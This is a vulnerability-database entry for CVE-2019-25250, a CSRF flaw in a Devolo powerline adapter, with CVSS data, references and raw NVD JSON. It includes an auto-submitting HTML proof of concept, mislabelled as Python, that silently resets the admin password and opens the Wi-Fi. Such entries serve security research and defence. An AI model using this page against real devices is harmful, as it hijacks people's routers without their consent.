CVE-2019-25250

Description

Devolo dLAN 500 AV Wireless+ 3.1.0-1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that trigger unauthorized configuration changes by exploiting predictable URL actions when a logged-in user visits the site.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Devolo dLAN 500 AV Wireless+ 3.1.0-1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2019-25250 -->
<!-- Devolo dLAN 500 AV Wireless+ Configuration Change -->
<!DOCTYPE html>
<html>
<head>
    <title>Device Configuration Update</title>
</head>
<body>
    <h1>Loading device configuration...</h1>
    
    <!-- Change admin password -->
    <form action="http://192.168.1.1/cgi-bin/password.cgi" method="POST" id="csrfForm">
        <input type="hidden" name="current_password" value="admin">
        <input type="hidden" name="new_password" value="hacked123">
        <input type="hidden" name="confirm_password" value="hacked123">
    </form>
    
    <!-- Change WiFi settings -->
    <form action="http://192.168.1.1/cgi-bin/wireless.cgi" method="POST" id="wifiForm">
        <input type="hidden" name="ssid" value="EvilNetwork">
        <input type="hidden" name="security" value="open">
        <input type="hidden" name="channel" value="6">
    </form>
    
    <script>
        // Auto-submit forms without user interaction
        document.getElementById('csrfForm').submit();
        setTimeout(function() {
            document.getElementById('wifiForm').submit();
        }, 1000);
    </script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25250
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25250
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25250/
[4] VulDB https://vuldb.com/cve/CVE-2019-25250
[5] https://www.devolo.com
[6] https://www.exploit-db.com/exploits/46324
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25250", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:53.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Devolo dLAN 500 AV Wireless+ 3.1.0-1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that trigger unauthorized configuration changes by exploiting predictable URL actions when a logged-in user visits the site."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://www.devolo.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46324", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5507.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}